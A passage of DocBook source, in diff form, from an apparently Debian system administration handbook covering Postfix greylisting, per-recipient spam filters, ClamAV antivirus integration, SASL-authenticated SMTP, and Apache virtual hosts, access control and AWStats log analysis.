+				Theoretically, greylisting should only delay the first mail from a given sender to a given recipient, and the typical delay is in the order of minutes. Reality, however, can differ slightly. Some large ISPs use clusters of SMTP servers, and when a message is initially rejected, the server that retries the transmission may not be the same as the initial one. When that happens, the second server gets a temporary error message due to greylisting too, and so on; it may take several hours until transmission is attempted by a server that has already been involved, since SMTP servers usually increase the delay between retries at each failure.
+			</para>
+			 <para>
+				As a consequence, the incoming IP address may vary in time even for a single sender. But it goes further: even the sender address can change. For instance, many mailing-list servers encode extra information in the sender address so as to be able to handle error messages (known as <emphasis>bounces</emphasis>). Each new message sent to a mailing-list may then need to go through greylisting, which means it has to be stored (temporarily) on the sender's server. For very large mailing-lists (with tens of thousands of subscribers), this can soon become a problem.
+			</para>
+			 <para>
+				To mitigate these drawbacks, Postgrey manages a whitelist of such sites, and messages emanating from them are immediately accepted without going through greylisting. This list can easily be adapted to local needs, since it is stored in the <filename>/etc/postgrey/whitelist_clients</filename> file.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>GOING FURTHER</emphasis> Selective greylisting with <emphasis role="pkg">milter-greylist</emphasis></title>
+			 <para>
+				The drawbacks of greylisting can be mitigated by only using greylisting on the subset of clients that are already considered as probable sources of spam (because they are listed in a DNS blacklist). This is not possible with <emphasis role="pkg">postgrey</emphasis> but <emphasis role="pkg">milter-greylist</emphasis> can be used in such a way.
+			</para>
+			 <para>
+				In that scenario, since DNS blacklists never triggers a definitive rejection, it becomes reasonable to use aggressive blacklists, including those listing all dynamic IP addresses from ISP clients (such as <literal>pbl.spamhaus.org</literal> or <literal>dul.dnsbl.sorbs.net</literal>).
+			</para>
+			 <para>
+				Since milter-greylist uses Sendmail's milter interface, the postfix side of its configuration is limited to “<literal>smtpd_milters = unix:/var/run/milter-greylist/milter-greylist.sock</literal>”. The <citerefentry><refentrytitle>greylist.conf</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> manual page documents <filename>/etc/milter-greylist/greylist.conf</filename> and the numerous ways to configure milter-greylist. You will also have to edit <filename>/etc/default/milter-greylist</filename> to actually enable the service.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Customizing Filters Based On the Recipient</title>
+			 <para>
+				<xref linkend="sect.restrictions-for-receiving-and-sending" /> and <xref linkend="sect.setting-up-greylisting" /> reviewed many of the possible restrictions. They all have their use in limiting the amount of received spam, but they also all have their drawbacks. It is therefore more and more common to customize the set of filters depending on the recipient. At Falcot Corp, greylisting is interesting for most users, but it hinders the work of some users who need low latency in their emails (such as the technical support service). Similarly, the commercial service sometimes has problems receiving emails from some Asian providers who may be listed in blacklists; this service asked for a non-filtered address so as to be able to correspond.
+			</para>
+			 <para>
+				Postfix provides such a customization of filters with a “restriction class” concept. The classes are declared in the <literal>smtpd_restriction_classes</literal> parameter, and defined the same way as <literal>smtpd_recipient_restrictions</literal>. The <literal>check_recipient_access</literal> directive then defines a table mapping a given recipient to the appropriate set of restrictions.
+			</para>
+			 <example>
+				<title>Defining restriction classes in <filename>main.cf</filename></title>
+				 
+<programlisting>smtpd_restriction_classes = greylisting, aggressive, permissive
+
+greylisting = check_policy_service inet:127.0.0.1:10023
+aggressive = reject_rbl_client sbl-xbl.spamhaus.org,
+        check_policy_service inet:127.0.0.1:10023
+permissive = permit
+
+smtpd_recipient_restrictions = permit_mynetworks,
+        reject_unauth_destination,
+        check_recipient_access hash:/etc/postfix/recipient_access
+</programlisting>
+
+			</example>
+			 <example>
+				<title>The <filename>/etc/postfix/recipient_access</filename> file</title>
+				 
+<programlisting>
+# Unfiltered addresses
+postmaster@falcot.com  permissive
+support@falcot.com     permissive
+sales-asia@falcot.com  permissive
+
+# Aggressive filtering for some privileged users
+joe@falcot.com         aggressive
+
+# Special rule for the mailing-list manager
+sympa@falcot.com       reject_unverified_sender
+
+# Greylisting by default
+falcot.com             greylisting
+</programlisting>
+
+			</example>
+
+		</section>
+		 <section id="sect.postfix-antivirus">
+			<title>Integrating an Antivirus</title>
+			 <indexterm>
+				<primary>antivirus</primary>
+			</indexterm>
+			 <para>
+				The many viruses circulating as attachments to emails make it important to set up an antivirus at the entry point of the company network, since despite an awareness campaign, some users will still open attachments from obviously shady messages.
+			</para>
+			 <para>
+				The Falcot administrators selected <command>clamav</command> for their free antivirus. The main package is <emphasis role="pkg">clamav</emphasis>, but they also installed a few extra packages such as <emphasis role="pkg">arj</emphasis>, <emphasis role="pkg">unzoo</emphasis>, <emphasis role="pkg">unrar</emphasis> and <emphasis role="pkg">lha</emphasis>, since they are required for the antivirus to analyze attachments archived in one of these formats.
+			</para>
+			 <indexterm>
+				<primary><command>clamav</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>clamav-milter</command></primary>
+			</indexterm>
+			 <para>
+				The task of interfacing between antivirus and the email server goes to <command>clamav-milter</command>. A <emphasis>milter</emphasis> (short for <emphasis>mail filter</emphasis>) is a filtering program specially designed to interface with email servers. A milter uses a standard application programming interface (API) that provides much better performance than filters external to the email servers. Milters were initially introduced by <emphasis>Sendmail</emphasis>, but <emphasis>Postfix</emphasis> soon followed suit.
+			</para>
+			 <sidebar> <title><emphasis>QUICK LOOK</emphasis> A milter for Spamassassin</title>
+			 <indexterm>
+				<primary><emphasis role="pkg">spamass-milter</emphasis></primary>
+			</indexterm>
+			 <para>
+				The <emphasis role="pkg">spamass-milter</emphasis> package provides a milter based on <emphasis>SpamAssassin</emphasis>, the famous unsolicited email detector. It can be used to flag messages as probable spams (by adding an extra header) and/or to reject the messages altogether if their “spamminess” score goes beyond a given threshold.
+			</para>
+			 </sidebar> <para>
+				Once the <emphasis role="pkg">clamav-milter</emphasis> package is installed, the milter should be reconfigured to run on a TCP port rather than on the default named socket. This can be achieved with <command>dpkg-reconfigure clamav-milter</command>. When prompted for the “Communication interface with Sendmail”, answer “<literal>inet:10002@127.0.0.1</literal>”.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Real TCP port vs named socket</title>
+			 <para>
+				The reason why we use a real TCP port rather than the named socket is that the postfix daemons often run chrooted and do not have access to the directory hosting the named socket. You could also decide to keep using a named socket and pick a location within the chroot (<filename>/var/spool/postfix/</filename>).
+			</para>
+			 </sidebar> <para>
+				The standard ClamAV configuration fits most situations, but some important parameters can still be customized with <command>dpkg-reconfigure clamav-base</command>.
+			</para>
+			 <para>
+				The last step involves telling Postfix to use the recently-configured filter. This is a simple matter of adding the following directive to <filename>/etc/postfix/main.cf</filename>:
+			</para>
+			 
+<programlisting>
+# Virus check with clamav-milter
+smtpd_milters = inet:[127.0.0.1]:10002
+</programlisting>
+			 <para>
+				If the antivirus causes problems, this line can be commented out, and <command>service postfix reload</command> should be run so that this change is taken into account.
+			</para>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Testing the antivirus</title>
+			 <para>
+				Once the antivirus is set up, its correct behavior should be tested. The simplest way to do that is to send a test email with an attachment containing the <filename>eicar.com</filename> (or <filename>eicar.com.zip</filename>) file, which can be downloaded online: <ulink type="block" url="http://www.eicar.org/86-0-Intended-use.html" />
+			</para>
+			 <para>
+				This file is not a true virus, but a test file that all antivirus software on the market diagnose as a virus to allow checking installations.
+			</para>
+			 </sidebar> <para>
+				All messages handled by Postfix now go through the antivirus filter.
+			</para>
+
+		</section>
+		 <section id="sect.authenticated-smtp">
+			<title>Authenticated SMTP</title>
+			 <para>
+				Being able to send emails requires an SMTP server to be reachable; it also requires said SMTP server to send emails through it. For roaming users, this may need regularly changing the configuration of the SMTP client, since Falcot's SMTP server rejects messages coming from IP addresses apparently not belonging to the company. Two solutions exist: either the roaming user installs an SMTP server on their computer, or they still use the company server with some means of authenticating as an employee. The former solution is not recommended since the computer won't be permanently connected, and it won't be able to retry sending messages in case of problems; we will focus on the latter solution.
+			</para>
+			 <para>
+				SMTP authentication in Postfix relies on SASL (<emphasis>Simple Authentication and Security Layer</emphasis>). It requires installing the <emphasis role="pkg">libsasl2-modules</emphasis> and <emphasis role="pkg">sasl2-bin</emphasis> packages, then registering a password in the SASL database for each user that needs authenticating on the SMTP server. This is done with the <command>saslpasswd2</command> command, which takes several parameters. The <literal>-u</literal> option defines the authentication domain, which must match the <literal>smtpd_sasl_local_domain</literal> parameter in the Postfix configuration. The <literal>-c</literal> option allows creating a user, and <literal>-f</literal> allows specifying the file to use if the SASL database needs to be stored at a different location than the default (<filename>/etc/sasldb2</filename>).
+			</para>
+			 
+<screen role="scale">
+<computeroutput># </computeroutput><userinput>saslpasswd2 -u `postconf -h myhostname` -f /var/spool/postfix/etc/sasldb2 -c jean</userinput>
+<computeroutput>[... type jean's password twice ...]</computeroutput></screen>
+			 <para>
+				Note that the SASL database was created in Postfix's directory. In order to ensure consistency, we also turn <filename>/etc/sasldb2</filename> into a symbolic link pointing at the database used by Postfix, with the <command>ln -sf /var/spool/postfix/etc/sasldb2 /etc/sasldb2</command> command.
+			</para>
+			 <para>
+				Now we need to configure Postfix to use SASL. First the <literal>postfix</literal> user needs to be added to the <literal>sasl</literal> group, so that it can access the SASL account database. A few new parameters are also needed to enable SASL, and the <literal>smtpd_recipient_restrictions</literal> parameter needs to be configured to allow SASL-authenticated clients to send emails freely.
+			</para>
+			 <example>
+				<title>Enabling SASL in <filename>/etc/postfix/main.cf</filename></title>
+				 
+<programlisting>
+# Enable SASL authentication
+smtpd_sasl_auth_enable = yes
+# Define the SASL authentication domain to use
+smtpd_sasl_local_domain = $myhostname
+[...]
+# Adding permit_sasl_authenticated before reject_unauth_destination
+# allows relaying mail sent by SASL-authenticated users
+smtpd_recipient_restrictions = permit_mynetworks,
+    permit_sasl_authenticated,
+    reject_unauth_destination,
+[...]
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>EXTRA</emphasis> Authenticated SMTP client</title>
+			 <para>
+				Most email clients are able to authenticate to an SMTP server before sending outgoing messages, and using that feature is a simple matter of configuring the appropriate parameters. If the client in use does not provide that feature, the workaround is to use a local Postfix server and configure it to relay email via the remote SMTP server. In this case, the local Postfix itself will be the client that authenticates with SASL. Here are the required parameters:
+			</para>
+			 
+<programlisting>
+smtp_sasl_auth_enable = yes
+smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
+relay_host = [mail.falcot.com]
+</programlisting>
+			 <para>
+				The <filename>/etc/postfix/sasl_passwd</filename> file needs to contain the username and password to use for authenticating on the <literal>mail.falcot.com</literal> server. Here is an example:
+			</para>
+			 
+<programlisting>
+[mail.falcot.com]   joe:LyinIsji
+</programlisting>
+			 <para>
+				As for all Postfix maps, this file must be turned into <filename>/etc/postfix/sasl_passwd.db</filename> with the <command>postmap</command> command.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.http-web-server">
+		<title>Web Server (HTTP)</title>
+		 <para>
+			The Falcot Corp administrators decided to use the Apache HTTP server, included in Debian <emphasis role="distribution">Jessie</emphasis> at version 2.4.10.
+		</para>
+		 <indexterm>
+			<primary><command>apache</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>server</primary>
+			<secondary>web</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>web server</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>server</primary>
+			<secondary>HTTP</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>HTTP</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Other web servers</title>
+		 <para>
+			Apache is merely the most widely-known (and widely-used) web server, but there are others; they can offer better performance under certain workloads, but this has its counterpart in the smaller number of available features and modules. However, when the prospective web server is built to serve static files or to act as a proxy, the alternatives, such as <emphasis role="pkg">nginx</emphasis> and <emphasis role="pkg">lighttpd</emphasis>, are worth investigating.
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">nginx</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="pkg">lighttpd</emphasis></primary>
+		</indexterm>
+		 </sidebar> <section>
+			<title>Installing Apache</title>
+			 <para>
+				Installing the <emphasis role="pkg">apache2</emphasis> package is all that is needed. It contains all the modules, including the <emphasis>Multi-Processing Modules</emphasis> (MPMs) that affect how Apache handles parallel processing of many requests (those used to be provided in separate <emphasis role="pkg">apache2-mpm-*</emphasis> packages). It will also pull <emphasis role="pkg">apache2-utils</emphasis> containing the command line utilities that we will discover later.
+			</para>
+			 <para>
+				The MPM in use affects significantly the way Apache will handle concurrent requests. With the <emphasis>worker</emphasis> MPM, it uses <emphasis>threads</emphasis> (lightweight processes), whereas with the <emphasis>prefork</emphasis> MPM it uses a pool of processes created in advance. With the <emphasis>event</emphasis> MPM it also uses threads, but the inactive connections (notably those kept open by the HTTP <emphasis>keep-alive</emphasis> feature) are handed back to a dedicated management thread.
+			</para>
+			 <para>
+				The Falcot administrators also install <emphasis role="pkg">libapache2-mod-php5</emphasis> so as to include the PHP support in Apache. This causes the default <emphasis>event</emphasis> MPM to be disabled, and <emphasis>prefork</emphasis> to be used instead, since PHP only works under that particular MPM.
+			</para>
+			 <sidebar> <title><emphasis>SECURITY</emphasis> Execution under the <literal>www-data</literal> user</title>
+			 <indexterm>
+				<primary><literal>www-data</literal></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>suexec</primary>
+			</indexterm>
+			 <para>
+				By default, Apache handles incoming requests under the identity of the <literal>www-data</literal> user. This means that a security vulnerability in a CGI script executed by Apache (for a dynamic page) won't compromise the whole system, but only the files owned by this particular user.
+			</para>
+			 <para>
+				Using the <emphasis>suexec</emphasis> modules allows bypassing this rule so that some CGI scripts are executed under the identity of another user. This is configured with a <literal>SuexecUserGroup <replaceable>user</replaceable><replaceable>group</replaceable></literal> directive in the Apache configuration.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">libapache2-mpm-itk</emphasis></primary>
+			</indexterm>
+			 <para>
+				Another possibility is to use a dedicated MPM, such as the one provided by <emphasis role="pkg">libapache2-mpm-itk</emphasis>. This particular one has a slightly different behavior: it allows “isolating” virtual hosts (actually, sets of pages) so that they each run as a different user. A vulnerability in one website therefore cannot compromise files belonging to the owner of another website.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>QUICK LOOK</emphasis> List of modules</title>
+			 <para>
+				The full list of Apache standard modules can be found online. <ulink type="block" url="http://httpd.apache.org/docs/2.4/mod/index.html" />
+			</para>
+			 </sidebar> <para>
+				Apache is a modular server, and many features are implemented by external modules that the main program loads during its initialization. The default configuration only enables the most common modules, but enabling new modules is a simple matter of running <command>a2enmod <replaceable>module</replaceable></command>; to disable a module, the command is <command>a2dismod <replaceable>module</replaceable></command>. These programs actually only create (or delete) symbolic links in <filename>/etc/apache2/mods-enabled/</filename>, pointing at the actual files (stored in <filename>/etc/apache2/mods-available/</filename>).
+			</para>
+			 <para>
+				With its default configuration, the web server listens on port 80 (as configured in <filename>/etc/apache2/ports.conf</filename>), and serves pages from the <filename>/var/www/html/</filename> directory (as configured in <filename>/etc/apache2/sites-enabled/000-default.conf</filename>).
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Adding support for SSL</title>
+			 <indexterm>
+				<primary>HTTPS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>HTTP</primary>
+				<secondary>secure</secondary>
+			</indexterm>
+			 <para>
+				Apache 2.4 includes the SSL module required for secure HTTP (HTTPS) out of the box. It just needs to be enabled with <command>a2enmod ssl</command>, then the required directives have to be added to the configuration files. A configuration example is provided in <filename>/etc/apache2/sites-available/default-ssl.conf</filename>. <ulink type="block" url="http://httpd.apache.org/docs/2.4/mod/mod_ssl.html" />
+			</para>
+			 <para>
+				Some extra care must be taken if you want to favor SSL connections with <emphasis>Perfect Forward Secrecy</emphasis> (those connections use ephemeral session keys ensuring that a compromission of the server's secret key does not result in the compromission of old encrypted traffic that could have been stored while sniffing on the network). Have a look at Mozilla's recommandations in particular: <ulink type="block" url="https://wiki.mozilla.org/Security/Server_Side_TLS#Apache" />
+			</para>
+			 <indexterm>
+				<primary><emphasis>Perfect Forward Secrecy</emphasis></primary>
+			</indexterm>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Configuring Virtual Hosts</title>
+			 <para>
+				A virtual host is an extra identity for the web server.
+			</para>
+			 <indexterm>
+				<primary>virtual host</primary>
+			</indexterm>
+			 <para>
+				Apache considers two different kinds of virtual hosts: those that are based on the IP address (or the port), and those that rely on the domain name of the web server. The first method requires allocating a different IP address (or port) for each site, whereas the second one can work on a single IP address (and port), and the sites are differentiated by the hostname sent by the HTTP client (which only works in version 1.1 of the HTTP protocol — fortunately that version is old enough that all clients use it already).
+			</para>
+			 <para>
+				The (increasing) scarcity of IPv4 addresses usually favors the second method; however, it is made more complex if the virtual hosts need to provide HTTPS too, since the SSL protocol hasn't always provided for name-based virtual hosting; the SNI extension (<emphasis>Server Name Indication</emphasis>) that allows such a combination is not handled by all browsers. When several HTTPS sites need to run on the same server, they will usually be differentiated either by running on a different port or on a different IP address (IPv6 can help there).
+			</para>
+			 <para>
+				The default configuration for Apache 2 enables name-based virtual hosts. In addition, a default virtual host is defined in the <literal>/etc/apache2/sites-enabled/000-default.conf</literal> file; this virtual host will be used if no host matching the request sent by the client is found.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> First virtual host</title>
+			 <para>
+				Requests concerning unknown virtual hosts will always be served by the first defined virtual host, which is why we defined <literal>www.falcot.com</literal> first here.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>QUICK LOOK</emphasis> Apache supports SNI</title>
+			 <indexterm>
+				<primary>Server Name Indication</primary>
+			</indexterm>
+			 <para>
+				The Apache server supports an SSL protocol extension called <emphasis>Server Name Indication</emphasis> (SNI). This extension allows the browser to send the hostname of the web server during the establishment of the SSL connection, much earlier than the HTTP request itself, which was previously used to identify the requested virtual host among those hosted on the same server (with the same IP address and port). This allows Apache to select the most appropriate SSL certificate for the transaction to proceed.
+			</para>
+			 <para>
+				Before SNI, Apache would always use the certificate defined in the default virtual host. Clients trying to access another virtual host would then display warnings, since the certificate they received didn't match the website they were trying to access. Fortunately, most browsers now work with SNI; this includes Microsoft Internet Explorer starting with version 7.0 (starting on Vista), Mozilla Firefox starting with version 2.0, Apple Safari since version 3.2.1, and all versions of Google Chrome.
+			</para>
+			 <para>
+				The Apache package provided in Debian is built with support for SNI; no particular configuration is therefore needed.
+			</para>
+			 <para>
+				Care should also be taken to ensure that the configuration for the first virtual host (the one used by default) does enable TLSv1, since Apache uses the parameters of this first virtual host to establish secure connections, and they had better allow them!
+			</para>
+			 </sidebar> <para>
+				Each extra virtual host is then described by a file stored in <filename>/etc/apache2/sites-available/</filename>. Setting up a website for the <literal>falcot.org</literal> domain is therefore a simple matter of creating the following file, then enabling the virtual host with <command>a2ensite www.falcot.org</command>.
+			</para>
+			 <example>
+				<title>The <filename>/etc/apache2/sites-available/www.falcot.org.conf</filename> file</title>
+				 
+<programlisting>
+&lt;VirtualHost *:80&gt;
+ServerName www.falcot.org
+ServerAlias falcot.org
+DocumentRoot /srv/www/www.falcot.org
+&lt;/VirtualHost&gt;
+</programlisting>
+
+			</example>
+			 <para>
+				The Apache server, as configured so far, uses the same log files for all virtual hosts (although this could be changed by adding <literal>CustomLog</literal> directives in the definitions of the virtual hosts). It therefore makes good sense to customize the format of this log file to have it include the name of the virtual host. This can be done by creating a <filename>/etc/apache2/conf-available/customlog.conf</filename> file that defines a new format for all log files (with the <literal>LogFormat</literal> directive) and by enabling it with <command>a2enconf customlog</command>. The <literal>CustomLog</literal> line must also be removed (or commented out) from the <filename>/etc/apache2/sites-available/000-default.conf</filename> file.
+			</para>
+			 <example>
+				<title>The <filename>/etc/apache2/conf.d/customlog.conf</filename> file</title>
+				 
+<programlisting role="scale">
+# New log format including (virtual) host name
+LogFormat "%v %h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" vhost
+
+# Now let's use this "vhost" format by default
+CustomLog /var/log/apache2/access.log vhost
+</programlisting>
+
+			</example>
+
+		</section>
+		 <section>
+			<title>Common Directives</title>
+			 <para>
+				This section briefly reviews some of the commonly-used Apache configuration directives.
+			</para>
+			 <indexterm>
+				<primary>Apache directives</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>directives, Apache</primary>
+			</indexterm>
+			 <para>
+				The main configuration file usually includes several <literal>Directory</literal> blocks; they allow specifying different behaviors for the server depending on the location of the file being served. Such a block commonly includes <literal>Options</literal> and <literal>AllowOverride</literal> directives.
+			</para>
+			 <indexterm>
+				<primary><literal>Options</literal>, Apache directive</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>AllowOverride</literal>, Apache directive</primary>
+			</indexterm>
+			 <example>
+				<title>Directory block</title>
+				 
+<programlisting>
+&lt;Directory /var/www&gt;
+Options Includes FollowSymlinks
+AllowOverride All
+DirectoryIndex index.php index.html index.htm
+&lt;/Directory&gt;
+</programlisting>
+
+			</example>
+			 <para>
+				The <literal>DirectoryIndex</literal> directive contains a list of files to try when the client request matches a directory. The first existing file in the list is used and sent as a response.
+			</para>
+			 <indexterm>
+				<primary><literal>DirectoryIndex</literal>, Apache directive</primary>
+			</indexterm>
+			 <para>
+				The <literal>Options</literal> directive is followed by a list of options to enable. The <literal>None</literal> value disables all options; correspondingly, <literal>All</literal> enables them all except <literal>MultiViews</literal>. Available options include:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>ExecCGI</literal> indicates that CGI scripts can be executed. <indexterm><primary><literal>ExecCGI</literal>, Apache directive</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>FollowSymlinks</literal> tells the server that symbolic links can be followed, and that the response should contain the contents of the target of such links. <indexterm><primary><literal>FollowSymlinks</literal>, Apache directive</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>SymlinksIfOwnerMatch</literal> also tells the server to follow symbolic links, but only when the link and the its target have the same owner. <indexterm><primary><literal>SymlinksIfOwnerMatch</literal>, Apache directive</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>Includes</literal> enables <emphasis>Server Side Includes</emphasis> (<emphasis>SSI</emphasis> for short). These are directives embedded in HTML pages and executed on the fly for each request. <indexterm><primary><literal>Includes</literal>, Apache directive</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>Indexes</literal> tells the server to list the contents of a directory if the HTTP request sent by the client points at a directory without an index file (ie, when no files mentioned by the <literal>DirectoryIndex</literal> directive exists in this directory). <indexterm><primary><literal>Indexes</literal>, Apache directive</primary></indexterm>
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>MultiViews</literal> enables content negotiation; this can be used by the server to return a web page matching the preferred language as configured in the browser. <indexterm><primary><literal>MultiViews</literal>, Apache directive</primary></indexterm>
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> <filename>.htaccess</filename> file</title>
+			 <para>
+				The <filename>.htaccess</filename> file contains Apache configuration directives enforced each time a request concerns an element of the directory where it is stored. The scope of these directives also recurses to all the subdirectories within.
+			</para>
+			 <indexterm>
+				<primary><filename>.htaccess</filename></primary>
+			</indexterm>
+			 <para>
+				Most of the directives that can occur in a <literal>Directory</literal> block are also legal in a <filename>.htaccess</filename> file.
+			</para>
+			 </sidebar> <para>
+				The <literal>AllowOverride</literal> directive lists all the options that can be enabled or disabled by way of a <filename>.htaccess</filename> file. A common use of this option is to restrict <literal>ExecCGI</literal>, so that the administrator chooses which users are allowed to run programs under the web server's identity (the <literal>www-data</literal> user).
+			</para>
+			 <indexterm>
+				<primary><literal>AllowOverride</literal>, Apache directive</primary>
+			</indexterm>
+			 <section>
+				<title>Requiring Authentication</title>
+				 <indexterm>
+					<primary>web authentication</primary>
+				</indexterm>
+				 <para>
+					In some circumstances, access to part of a website needs to be restricted, so only legitimate users who provide a username and a password are granted access to the contents.
+				</para>
+				 <example>
+					<title><filename>.htaccess</filename> file requiring authentication</title>
+					 
+<programlisting>
+Require valid-user
+AuthName "Private directory"
+AuthType Basic
+AuthUserFile /etc/apache2/authfiles/htpasswd-private
+</programlisting>
+
+				</example>
+				 <sidebar> <title><emphasis>SECURITY</emphasis> No security</title>
+				 <para>
+					The authentication system used in the above example (<literal>Basic</literal>) has minimal security as the password is sent in clear text (it is only encoded as <emphasis>base64</emphasis>, which is a simple encoding rather than an encryption method). It should also be noted that the documents “protected” by this mechanism also go over the network in the clear. If security is important, the whole HTTP connection should be encrypted with SSL.
+				</para>
+				 </sidebar> <para>
+					The <filename>/etc/apache2/authfiles/htpasswd-private</filename> file contains a list of users and passwords; it is commonly manipulated with the <command>htpasswd</command> command. For example, the following command is used to add a user or change their password: <indexterm><primary><command>htpasswd</command></primary></indexterm>
+				</para>
+				 
+<screen>
+<computeroutput># </computeroutput><userinput>htpasswd /etc/apache2/authfiles/htpasswd-private <replaceable>user</replaceable>
+</userinput><computeroutput>New password:
+Re-type new password:
+Adding password for user <replaceable>user</replaceable>
+</computeroutput></screen>
+
+			</section>
+			 <section>
+				<title>Restricting Access</title>
+				 <indexterm>
+					<primary>web access restriction</primary>
+				</indexterm>
+				 <para>
+					The <literal>Require</literal> directive controls access restrictions for a directory (and its subdirectories, recursively).
+				</para>
+				 <indexterm>
+					<primary>Apache directives</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>directives, Apache</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Require</literal>, Apache directive</primary>
+				</indexterm>
+				 <para>
+					It can be used to restrict access based on many criteria; we will stop at describing access restriction based on the IP address of the client, but it can be made much more powerful than that, especially when several <literal>Require</literal> directives are combined within a <literal>RequireAll</literal> block.
+				</para>
+				 <example>
+					<title>Only allow from the local network</title>
+					 
+<programlisting>Require ip 192.168.0.0/16
+</programlisting>
+
+				</example>
+				 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Old syntax</title>
+				 <para>
+					The <literal>Require</literal> syntax is only available in Apache 2.4 (the version in <emphasis role="distribution">Jessie</emphasis>). For users of <emphasis role="distribution">Wheezy</emphasis>, the Apache 2.2 syntax is different, and we describe it here mainly for reference, although it can also be made available in Apache 2.4 using the <literal>mod_access_compat</literal> module.
+				</para>
+				 <para>
+					The <literal>Allow from</literal> and <literal>Deny from</literal> directives control access restrictions for a directory (and its subdirectories, recursively).
+				</para>
+				 <indexterm>
+					<primary><literal>Allow from</literal>, Apache directive</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Deny from</literal>, Apache directive</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>Order</literal>, Apache directive</primary>
+				</indexterm>
+				 <para>
+					The <literal>Order</literal> directive tells the server of the order in which the <literal>Allow from</literal> and <literal>Deny from</literal> directives are applied; the last one that matches takes precedence. In concrete terms, <literal>Order deny,allow</literal> allows access if no <literal>Deny from</literal> applies, or if an <literal>Allow from</literal> directive does. Conversely, <literal>Order allow,deny</literal> rejects access if no <literal>Allow from</literal> directive matches (or if a <literal>Deny from</literal> directive applies).
+				</para>
+				 <para>
+					The <literal>Allow from</literal> and <literal>Deny from</literal> directives can be followed by an IP address, a network (such as <literal>192.168.0.0/255.255.255.0</literal>, <literal>192.168.0.0/24</literal> or even <literal>192.168.0</literal>), a hostname or a domain name, or the <literal>all</literal> keyword, designating everyone.
+				</para>
+				 <para>
+					For instance, to reject connections by default but allow them from the local network, you could use this:
+				</para>
+				 
+<programlisting>
+Order deny,allow
+Allow from 192.168.0.0/16
+Deny from all
+</programlisting>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section>
+			<title>Log Analyzers</title>
+			 <para>
+				A log analyzer is frequently installed on a web server; since the former provides the administrators with a precise idea of the usage patterns of the latter.
+			</para>
+			 <para>
+				The Falcot Corp administrators selected <emphasis>AWStats</emphasis> (<emphasis>Advanced Web Statistics</emphasis>) to analyze their Apache log files.
+			</para>
+			 <indexterm>
+				<primary><emphasis>AWStats</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>web logs analyzer</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>logs</primary>
+				<secondary>web logs analyzer</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>analyzer of web logs</primary>
+			</indexterm>
+			 <para>
+				The first configuration step is the customization of the <filename>/etc/awstats/awstats.conf</filename> file. The Falcot administrators keep it unchanged apart from the following parameters:
+			</para>
+			 
+<programlisting>
+LogFile="/var/log/apache2/access.log"
+LogFormat = "%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot"
+SiteDomain="www.falcot.com"
+HostAliases="falcot.com REGEX[^.*\.falcot\.com$]"
+DNSLookup=1
+LoadPlugin="tooltips"
+</programlisting>
+			 <para>
+				All these parameters are documented by comments in the template file. In particular, the <varname>LogFile</varname> and <varname>LogFormat</varname> parameters describe the location and format of the log file and the information it contains; <varname>SiteDomain</varname> and <varname>HostAliases</varname> list the various names under which the main web site is known.
+			</para>
+			 <para>
+				For high traffic sites, <varname>DNSLookup</varname> should usually not be set to <literal>1</literal>; for smaller sites, such as the Falcot one described above, this setting allows getting more readable reports that include full machine names instead of raw IP addresses.
+			</para>
+			 <sidebar> <title><emphasis>SECURITY</emphasis> Access to statistics</title>
+			 <para>
+				AWStats makes its statistics available on the website with no restrictions by default, but restrictions can be set up so that only a few (probably internal) IP addresses can access them; the list of allowed IP addresses needs to be defined in the <varname>AllowAccessFromWebToFollowingIPAddresses</varname> parameter
+			</para>
+			 </sidebar> <para>
+				AWStats will also be enabled for other virtual hosts; each virtual host needs its own configuration file, such as <filename>/etc/awstats/awstats.www.falcot.org.conf</filename>.
+			</para>
+			 <example>
+				<title>AWStats configuration file for a virtual host</title>
+				 
+<programlisting>
